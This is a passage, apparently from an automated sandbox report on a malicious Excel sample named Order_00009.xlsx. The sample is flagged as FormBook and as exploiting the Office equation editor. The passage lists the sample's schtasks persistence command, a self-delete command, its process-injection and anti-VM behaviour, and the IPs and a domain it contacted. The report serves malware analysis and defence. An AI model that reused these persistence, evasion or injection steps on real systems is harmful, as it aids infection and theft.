          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Order_00009.xlsxStatic file information: File size 1419776 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000003.2236618146.00000000004A2000.00000004.00000001.sdmp
          Source: Order_00009.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Order_00009.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: file2[1].exe.2.dr, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: JcEEHoQdnETCO.exe.4.dr, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.190000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0027C475 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041508E push ebp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040C2CA push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040C31A push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004153DF pushad ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B3B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B46C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B402 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041B40B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00414DDA pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040EEAA push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0087DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009508E push ebp; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0008C2CA push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0008C31A push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000953DF pushad ; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009B46C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00094DDA pushfd ; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0008EEAA push esp; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Order_00009.xlsxStream path 'EncryptedPackage' entropy: 7.99985530871 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2300, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2352Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2664Thread sleep time: -31500s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2764Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2780Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2224Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMWARE8
          Source: explorer.exe, 00000008.00000000.2194181477.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.2380101325.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2194237731.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMwareHD2m
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: QEMU8
          Source: explorer.exe, 00000008.00000000.2194181477.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2183601231.00000000007D1000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: 1m"SOFTWARE\VMware, Inc.\VMware Tools8
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: 1m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMware HD2m
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMWAREHD2m
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000008.00000000.2185401760.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpBinary or memory string: vmware8
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00409B20 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_008826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.172.94.1 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 9C0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: FFFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: explorer.exe, 00000008.00000002.2380384932.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2380384932.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2380101325.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2380384932.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection812Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Process Injection812NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339205 Sample: Order_00009.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 20 other signatures 2->65 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 37 17 2->14         started        process3 dnsIp4 43 medicelcoolers.cn 185.26.106.165, 49165, 80 ATE-ASFR France 9->43 37 C:\Users\user\AppData\Local\...\file2[1].exe, PE32 9->37 dropped 39 C:\Users\Public\vbc.exe, PE32 9->39 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->83 16 vbc.exe 3 9->16         started        41 C:\Users\user\Desktop\~$Order_00009.xlsx, data 14->41 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\...\JcEEHoQdnETCO.exe, PE32 16->33 dropped 35 C:\Users\user\AppData\Local\...\tmp85C4.tmp, XML 16->35 dropped 51 Machine Learning detection for dropped file 16->51 53 Writes to foreign memory regions 16->53 55 Allocates memory in foreign processes 16->55 57 Injects a PE file into a foreign processes 16->57 20 vbc.exe 